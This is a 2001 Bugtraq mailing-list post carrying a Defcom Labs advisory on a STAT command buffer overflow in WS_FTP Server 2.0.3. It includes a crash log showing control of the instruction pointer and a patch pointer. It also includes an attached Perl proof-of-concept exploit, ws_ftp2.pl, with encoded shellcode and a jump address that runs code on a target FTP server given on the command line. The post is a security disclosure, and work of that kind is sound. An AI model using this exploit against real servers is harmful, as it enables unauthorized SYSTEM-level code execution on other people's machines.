[23066] in bugtraq
def-2001-31
daemon@ATHENA.MIT.EDU (andreas junestam)
Mon Nov 5 12:37:03 2001
Message-ID: <3BE6572C.FBA535B7@defcom.com>
Date: Mon, 05 Nov 2001 10:09:00 +0100
From: andreas junestam <andreas.junestam@defcom.com>
MIME-Version: 1.0
To: bugtraq <bugtraq@securityfocus.com>
Content-Type: multipart/mixed;
boundary="------------20067D626DDC99B39503357C"
--------------20067D626DDC99B39503357C
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
======================================================================
Defcom Labs Advisory def-2001-31
WS_FTP server 2.0.3 Buffer Overflow
Author: Andreas Junestam <andreas@defcom.com>
Co-Author: Janne Sarendal <janne@defcom.com>
Release Date: 2001-10-05
======================================================================
------------------------=[Brief Description]=-------------------------
WS_FTP server 2.0.3 contains a buffer overflow which affects the
STAT command. This buffer overflow gives an attacker the ability to
run code on the target with SYSTEM RIGHTS, due to the fact that the
server runs as a service by default.
------------------------=[Affected Systems]=--------------------------
- WS_FTP server 2.0.3 and possibly earlier versions
----------------------=[Detailed Description]=------------------------
* Command Buffer Overrun
The parsing code for the STAT command suffers from a buffer
overflow. By sending a STAT command followed by an argument greater
than 479 (475 bytes + new return address) bytes, a buffer will
overflow and the EIP will be overwritten. The overflow is dependant
on the size of the name of the server because the argument, the
servername and some more information is wsprint'ed together in the
buffer. A proof-of-concept exploit is attached to the advisory.
C:\tools\web>nc localhost 21
220-helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
220-Wed Aug 08 19:57:40 2001
220-30 days remaining on evaluation.
220 helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
user ftp
331 Password required
pass ftp
230 user logged in
stat AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
0808 19:57:40 (000002e8) 127.0.0.1:1131 connected to 127.0.0.1:21
SetFolder = C:\program\iFtpSvc\helig
SetFolder = C:\program\iFtpSvc\helig\public
SetFolder = C:/program/iFtpSvc/helig
0808 19:57:43 (000002e8) helig S(0) 127.0.0.1 anon-ftp logon success
(A1)
Access violation - code c0000005 (first chance)
eax=000000ea ebx=0067c280 ecx=000000ea edx=00000002
esi=0067c280 edi=00130178
eip=41414141 esp=0104ded4 ebp=41414141 iopl=0
41414141 ?? ???
---------------------------=[Workaround]=-----------------------------
Download new version(2.0.4) from:
http://www.ipswitch.com/support/WS_FTP-Server/patch-upgrades.html
-----------------------------=[Exploit]=------------------------------
See attached file, ws_ftp2.pl
-------------------------=[Vendor Response]=--------------------------
This issue was brought to the vendors attention on the 8th of
August, 2001. Patch is released.
======================================================================
This release was brought to you by Defcom Labs
labs@defcom.com http://labs.defcom.com
======================================================================
--------------20067D626DDC99B39503357C
Content-Type: application/x-perl;
name="ws_ftp2.pl"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="ws_ftp2.pl"
#########################################################################
#
# WS_FTP Server 2.0.3 STAT proof-of-concept exploit
# By andreas@defcom.com (C)2001
#
#
# There are a couple of things screwing up this exploit. First, the
# total number of bytes we control in the area where ESP is pointing,
# corresponds to the number of bytes in the domain name. So, to make sure
# it works on as many systems as possible, Im only using 2 bytes here.
# So, we have to jump back through the buffer... Fun.. :)
# Second, the number of bytes needed to overwrite EIP is dependant on the
# number of bytes in the server name.
# Third, the stack has to be moved to the heap, because there is no
# good place on the stack, it just ends with CreateFile overwriting stuff.
#
# Im using a "jump esp" in shlwapi.dll(0x70beed87) as the return address,
# change this if it does not work on your system.
#
#########################################################################
$login="ftp"; #username
$pass="ftp"; #password
#########################################################################
$ARGC=@ARGV;
if ($ARGC !=1) {
print "WS_FTP server 2.0.3 STAT proof-of-concept exploit\n";
print "It creates a file named defcom.iyd in the c-root\n";
print "(C)2001 andreas\@defcom.com\n";
print "Usage: $0 <host>\n";
print "Example: $0 127.0.0.1\n";
exit;
}
use Socket;
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port = "21";
$iaddr = inet_aton($remote) or die "Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "Error: $!";
$proto = getprotobyname('tcp') or die "Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!";
connect(SOCK, $paddr) or die "Error: $!";
###########################################################################################
# get servername and length of domain
recv(SOCK,$reply,1024,0);
@split1 = split(/\ /,$reply);
@split2 = split(/\-/,$split1[0]);
$servername = $split2[1];
$pos = index($servername,"\.");
if ($pos == -1) { print "Error: Domain has to be atleast two characters"; exit; }
$domain = substr($servername,$pos);
if (length($domain) < 2) { print "Error: Domain has to be atleast two characters"; exit; }
###########################################################################################
sleep(1);
$msg = "user $login\n";
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$msg = "pass $pass\n";
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
$sploit="\xeb\x03\x5a\xeb\x05\xe8\xf8\xff\xff\xff\x8b\xc2\x83\xc0\x1a\xeb\x02\xeb\x80\x33";
$sploit = $sploit . "\xc9\x66\xb9\xd6\x80\x66\x81\xf1\x80\x80\x80\x30\x99\x40\xe2\xfa\x12";
$sploit = $sploit . "\x7b\x1a\x75\x92\x12\x75\xcb\xf1\x99\x63\x99\x99\xf1\xd9\x99\x99\x99";
$sploit = $sploit . "\x27\x45\x8d\xdc\x99\x66\x8f\xc3\x9c\x99\x63\x99\x99\x12\x79\x12\x75";
$sploit = $sploit . "\xaa\x59\xf1\x19\x99\x99\x99\xf3\x9b\xc9\xc9\xf1\x99\x99\x99\x89\x1a";
$sploit = $sploit . "\x5b\xfb\xcb\x27\xbd\x8c\xdc\x99\x66\x8f\xaa\x59\xc9\x27\x89\x8f\xdc";
$sploit = $sploit . "\x99\x66\x8f\xfa\xa3\xc5\xfd\xfc\xff\xfa\xf6\xf4\xb7\xf0\xe0\xfd\x99";
$msg = "stat " . "\x90" x (480-length($sploit)-length($servername)) . $sploit . "\x87\xed\xbe\x70" . "\x90" x 16 . "\xeb\x81" . "\r\n";
print $msg;
sleep(1);
send(SOCK, $msg, 0) or die "Cannot send query: $!";
sleep(1);
exit;
--------------20067D626DDC99B39503357C--
